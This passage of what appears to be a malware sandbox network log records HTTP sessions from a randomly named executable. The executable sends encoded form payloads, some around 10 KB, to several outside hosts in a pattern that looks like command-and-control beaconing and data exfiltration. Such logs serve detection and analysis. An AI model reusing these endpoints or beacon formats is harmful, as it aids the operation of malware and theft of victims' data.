                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
                                                                                                      Oct 22, 2024 09:07:14.565956116 CEST185INData Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34
                                                                                                      Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      40192.168.2.45004738.88.82.56805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:07:16.453634024 CEST455OUTGET /lk0h/?_XPD90E=6gjDnw5yzGoGzEh46TJn2EnJvnJvbPG1/sFM8kPHd8kBOmP5HGhCeqzML2uvlXpT0wvdsm4ji4CabuXPMFeE122DOs0WcAnE5aNnG7jZJGeJUpqu0deDiTw=&qp=qTZ8t28 HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.college-help.info
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:07:17.153773069 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:07:17 GMT
                                                                                                      Server: Apache
                                                                                                      Last-Modified: Thu, 17 Oct 2024 16:54:13 GMT
                                                                                                      ETag: "49d-624af093dd2da"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 1181
                                                                                                      Content-Type: text/html
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
                                                                                                      Oct 22, 2024 09:07:17.153790951 CEST185INData Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34
                                                                                                      Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      41192.168.2.4500483.33.130.190805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:07:22.270895958 CEST712OUTPOST /17h7/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.owinvip.net
                                                                                                      Origin: http://www.owinvip.net
                                                                                                      Referer: http://www.owinvip.net/17h7/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 7a 67 52 4b 39 61 61 58 62 52 6a 31 73 61 46 32 41 56 4e 51 35 4b 75 34 52 39 48 47 70 31 46 64 37 6d 6e 7a 6d 45 58 34 63 74 65 6c 32 45 2b 53 68 6f 45 64 6e 59 57 7a 62 52 54 4f 74 71 66 51 2b 56 76 50 50 78 4b 2f 6f 74 36 44 67 6b 71 71 44 78 5a 76 67 5a 41 51 49 63 76 77 34 63 35 35 77 75 2f 64 55 56 4e 74 57 66 65 58 2b 6d 6a 4b 4c 68 34 47 73 62 41 4b 74 57 68 53 67 6a 51 71 41 46 74 72 73 55 38 75 4c 4b 70 73 39 4c 78 66 78 4a 30 79 62 51 6f 4b 74 4d 43 72 2f 54 74 71 79 76 6b 6f 72 6a 2b 55 49 43 38 2f 65 46 6e 54 48 42 59 2b 61 49 45 67 77 52 4b 53 39 31 77 71 50 67 3d 3d
                                                                                                      Data Ascii: _XPD90E=zgRK9aaXbRj1saF2AVNQ5Ku4R9HGp1Fd7mnzmEX4ctel2E+ShoEdnYWzbRTOtqfQ+VvPPxK/ot6DgkqqDxZvgZAQIcvw4c55wu/dUVNtWfeX+mjKLh4GsbAKtWhSgjQqAFtrsU8uLKps9LxfxJ0ybQoKtMCr/Ttqyvkorj+UIC8/eFnTHBY+aIEgwRKS91wqPg==


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      42192.168.2.4500493.33.130.190805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:07:24.809139967 CEST732OUTPOST /17h7/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.owinvip.net
                                                                                                      Origin: http://www.owinvip.net
                                                                                                      Referer: http://www.owinvip.net/17h7/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 7a 67 52 4b 39 61 61 58 62 52 6a 31 71 35 64 32 4d 57 6c 51 6f 71 75 35 66 64 48 47 6a 56 46 52 37 6d 72 7a 6d 46 44 57 64 65 36 6c 32 6c 4f 53 69 70 45 64 72 34 57 7a 55 78 54 4c 79 36 65 53 2b 56 54 48 50 78 6d 2f 6f 73 65 44 67 68 4f 71 44 43 42 67 68 4a 41 53 42 38 76 6c 31 38 35 35 77 75 2f 64 55 56 59 41 57 66 32 58 2b 58 54 4b 4e 41 34 48 67 37 41 4a 71 57 68 53 71 44 51 78 41 46 74 64 73 51 30 49 4c 4a 42 73 39 4f 4e 66 78 64 68 41 56 51 70 50 6a 73 44 4a 33 69 45 79 72 39 30 67 31 6c 71 6f 4a 44 6b 54 62 44 71 4a 57 77 35 70 49 49 67 54 74 57 44 6d 77 32 4e 6a 55 6b 49 4d 59 35 69 6c 78 78 70 6f 45 6d 59 36 6d 47 62 50 51 51 6b 3d
                                                                                                      Data Ascii: _XPD90E=zgRK9aaXbRj1q5d2MWlQoqu5fdHGjVFR7mrzmFDWde6l2lOSipEdr4WzUxTLy6eS+VTHPxm/oseDghOqDCBghJASB8vl1855wu/dUVYAWf2X+XTKNA4Hg7AJqWhSqDQxAFtdsQ0ILJBs9ONfxdhAVQpPjsDJ3iEyr90g1lqoJDkTbDqJWw5pIIgTtWDmw2NjUkIMY5ilxxpoEmY6mGbPQQk=


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      43192.168.2.4500503.33.130.190805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:07:27.354556084 CEST10814OUTPOST /17h7/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.owinvip.net
                                                                                                      Origin: http://www.owinvip.net
                                                                                                      Referer: http://www.owinvip.net/17h7/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 7a 67 52 4b 39 61 61 58 62 52 6a 31 71 35 64 32 4d 57 6c 51 6f 71 75 35 66 64 48 47 6a 56 46 52 37 6d 72 7a 6d 46 44 57 64 65 79 6c 31 58 32 53 6b 36 63 64 6f 34 57 7a 4b 68 54 4b 79 36 65 54 2b 56 4c 44 50 78 37 64 6f 76 32 44 6a 43 32 71 4c 58 31 67 72 4a 41 53 44 38 75 43 34 63 35 67 77 75 50 5a 55 56 49 41 57 66 32 58 2b 55 62 4b 4e 52 34 48 6d 37 41 4b 74 57 68 65 67 6a 52 65 41 46 31 4e 73 51 78 31 4c 35 68 73 38 76 39 66 30 75 5a 41 4b 67 70 4e 75 4d 44 76 33 69 59 54 72 39 35 62 31 6c 32 47 4a 44 41 54 61 6e 66 76 4b 68 49 33 65 2b 6b 74 7a 6d 33 58 32 31 6c 7a 61 54 42 34 59 59 32 44 6a 6a 6c 31 44 78 6f 2b 69 55 33 63 54 46 6c 4c 52 34 56 78 34 47 54 79 64 67 6b 2b 33 32 73 68 32 77 62 62 72 54 53 48 63 42 32 41 7a 32 49 48 41 4b 41 68 42 61 74 36 33 73 4b 67 6c 6b 41 4d 53 47 30 54 2b 67 38 6e 6b 56 67 64 68 43 66 47 68 31 4b 67 4c 35 59 64 78 76 4d 46 72 4f 72 33 7a 67 6d 5a 36 6c 6b 6c 69 6a 35 6b 31 4c 35 6b 75 38 78 56 34 74 2f 74 45 69 55 76 49 33 7a 6f 62 46 [TRUNCATED]
                                                                                                      Data Ascii: _XPD90E=zgRK9aaXbRj1q5d2MWlQoqu5fdHGjVFR7mrzmFDWdeyl1X2Sk6cdo4WzKhTKy6eT+VLDPx7dov2DjC2qLX1grJASD8uC4c5gwuPZUVIAWf2X+UbKNR4Hm7AKtWhegjReAF1NsQx1L5hs8v9f0uZAKgpNuMDv3iYTr95b1l2GJDATanfvKhI3e+ktzm3X21lzaTB4YY2Djjl1Dxo+iU3cTFlLR4Vx4GTydgk+32sh2wbbrTSHcB2Az2IHAKAhBat63sKglkAMSG0T+g8nkVgdhCfGh1KgL5YdxvMFrOr3zgmZ6lklij5k1L5ku8xV4t/tEiUvI3zobFiYSVLyO2mCndMWvnROVlA265DbZRqkLsTV7uxi0VGMUKJ0rbA2WyGukwpcwplKxdjBxhlTv9QG18n7s35CXpqoLzJ6WbsUlvujS2uR3gfgitGLX0RcQd1jwvVI/alrdK1TgY8ytno5DmPbquVjcYt2z24+yglc/kjX+E/CkDfAU2zwmSHuKHVS3Fu14P8xkc3KyPlEWS3I/xFfM7l5UkGXLjw25fwS4Avh546pKBQfAPnq9pbRv7j+jIG+U0iyjTPPVdx6q+K1xS0ni8YQLmK+qDEgi+bJVhsQXlJSD0B3b81WCTg3KnyRCzoeIL6Kk0Nd5RVqZaWzbCCZ6v3NaLOMYqiFnSGnkwOBEwc6c0m6nf996n7256wMCStCJPU01OHCrmotk16rBaRgu1pnF2ZGqAV4src85YTptP7JLi4aEH9KRfHaYoy0KDbIWa5u1nNKF2sSD/XKLLXqojdsq8SmIlrHfhVyYqun6Nz/7P6O/ywtB5ngzmUNnri/my04+RPNEaB6E9UGUwFnjzLzZGS2hH0owJfWIY99XphmLxdKVFJefx7bmu4MnaGj0560WZNKWEUt0KaspnFAbeYYqEkyvJ7l1KeN80Eb5lH5HSWnf8CZeqGBcUTiVfCq0RkA9MxkvS/xzTHTexuVz5eIuN1VSxmC+StqJUE3 [TRUNCATED]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      44192.168.2.4500513.33.130.190805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:07:29.898114920 CEST449OUTGET /17h7/?_XPD90E=+i5q+uzPXmftyZtCFmFN/bfjFcDFo1tt3jjX/X3oRNPJ70eO25N0w4zqWgP4747OpVXsIhnZv7nMmjeXISBt4oYBPdG29ddF3diydwcHNPuP0zH2BXR0jrQ=&qp=qTZ8t28 HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.owinvip.net
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:07:31.443809986 CEST394INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Tue, 22 Oct 2024 07:07:31 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 254
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5f 58 50 44 39 30 45 3d 2b 69 35 71 2b 75 7a 50 58 6d 66 74 79 5a 74 43 46 6d 46 4e 2f 62 66 6a 46 63 44 46 6f 31 74 74 33 6a 6a 58 2f 58 33 6f 52 4e 50 4a 37 30 65 4f 32 35 4e 30 77 34 7a 71 57 67 50 34 37 34 37 4f 70 56 58 73 49 68 6e 5a 76 37 6e 4d 6d 6a 65 58 49 53 42 74 34 6f 59 42 50 64 47 32 39 64 64 46 33 64 69 79 64 77 63 48 4e 50 75 50 30 7a 48 32 42 58 52 30 6a 72 51 3d 26 71 70 3d 71 54 5a 38 74 32 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?_XPD90E=+i5q+uzPXmftyZtCFmFN/bfjFcDFo1tt3jjX/X3oRNPJ70eO25N0w4zqWgP4747OpVXsIhnZv7nMmjeXISBt4oYBPdG29ddF3diydwcHNPuP0zH2BXR0jrQ=&qp=qTZ8t28"}</script></head></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      45192.168.2.450052178.79.184.196805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:07:36.510354042 CEST724OUTPOST /x3by/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.gucciqueen.shop
                                                                                                      Origin: http://www.gucciqueen.shop
                                                                                                      Referer: http://www.gucciqueen.shop/x3by/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 4c 6f 63 47 38 71 35 73 30 54 69 7a 4b 71 37 4b 77 31 50 30 56 38 69 6b 47 79 46 73 2f 5a 69 31 4d 57 38 4b 51 6d 63 31 43 36 31 37 56 51 50 38 31 63 5a 4c 33 51 4a 43 2b 47 42 55 65 76 43 32 53 62 63 66 75 44 45 7a 6c 54 38 56 66 6e 74 75 43 31 34 39 67 79 6a 32 2f 74 49 74 2f 61 5a 4a 32 69 4c 68 55 34 52 7a 4c 4c 6f 5a 4f 65 35 51 63 4b 75 30 2b 37 6b 44 37 62 33 59 6f 72 6d 56 34 72 63 46 46 49 6e 76 6a 55 47 46 6d 63 34 62 77 4a 35 42 4d 4a 38 72 44 6e 78 6f 76 50 69 35 7a 36 6f 70 38 52 74 46 70 55 76 50 2f 4e 35 53 30 43 62 37 4e 6c 7a 41 56 6f 35 59 45 73 47 6b 36 67 3d 3d
                                                                                                      Data Ascii: _XPD90E=LocG8q5s0TizKq7Kw1P0V8ikGyFs/Zi1MW8KQmc1C617VQP81cZL3QJC+GBUevC2SbcfuDEzlT8VfntuC149gyj2/tIt/aZJ2iLhU4RzLLoZOe5QcKu0+7kD7b3YormV4rcFFInvjUGFmc4bwJ5BMJ8rDnxovPi5z6op8RtFpUvP/N5S0Cb7NlzAVo5YEsGk6g==
                                                                                                      Oct 22, 2024 09:07:37.305147886 CEST461INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:07:37 GMT
                                                                                                      Server: Apache/2.4.62 (Debian)
                                                                                                      Content-Length: 281
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      46192.168.2.450053178.79.184.196805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:07:39.057894945 CEST744OUTPOST /x3by/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.gucciqueen.shop
                                                                                                      Origin: http://www.gucciqueen.shop
                                                                                                      Referer: http://www.gucciqueen.shop/x3by/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 4c 6f 63 47 38 71 35 73 30 54 69 7a 4a 4f 2f 4b 6a 6d 58 30 43 4d 69 6e 4a 53 46 73 31 35 69 35 4d 58 41 4b 51 6e 70 71 42 49 52 37 55 31 72 38 32 64 5a 4c 6e 41 4a 43 30 6d 42 52 61 76 44 34 53 62 59 58 75 47 6b 7a 6c 53 63 56 66 69 52 75 44 47 51 79 76 43 6a 77 2b 64 49 56 79 36 5a 4a 32 69 4c 68 55 34 56 5a 4c 4c 77 5a 4f 4f 4a 51 64 72 75 31 69 72 6b 45 74 72 33 59 2b 62 6d 52 34 72 63 72 46 4a 37 42 6a 58 75 46 6d 64 49 62 7a 61 68 47 62 35 38 6c 65 58 77 57 68 4d 62 30 35 71 52 30 35 69 4e 32 68 56 50 32 33 72 30 49 6c 7a 36 73 66 6c 58 7a 49 76 77 73 4a 76 37 74 68 70 55 79 37 44 6f 59 4f 34 64 44 2f 72 78 48 6c 34 43 64 68 62 41 3d
                                                                                                      Data Ascii: _XPD90E=LocG8q5s0TizJO/KjmX0CMinJSFs15i5MXAKQnpqBIR7U1r82dZLnAJC0mBRavD4SbYXuGkzlScVfiRuDGQyvCjw+dIVy6ZJ2iLhU4VZLLwZOOJQdru1irkEtr3Y+bmR4rcrFJ7BjXuFmdIbzahGb58leXwWhMb05qR05iN2hVP23r0Ilz6sflXzIvwsJv7thpUy7DoYO4dD/rxHl4CdhbA=
                                                                                                      Oct 22, 2024 09:07:39.860501051 CEST461INHTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:07:39 GMT
                                                                                                      Server: Apache/2.4.62 (Debian)
                                                                                                      Content-Length: 281
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 75 63 63 69 71 75 65 65 6e 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      47192.168.2.450054178.79.184.196805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:07:41.613723993 CEST10826OUTPOST /x3by/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
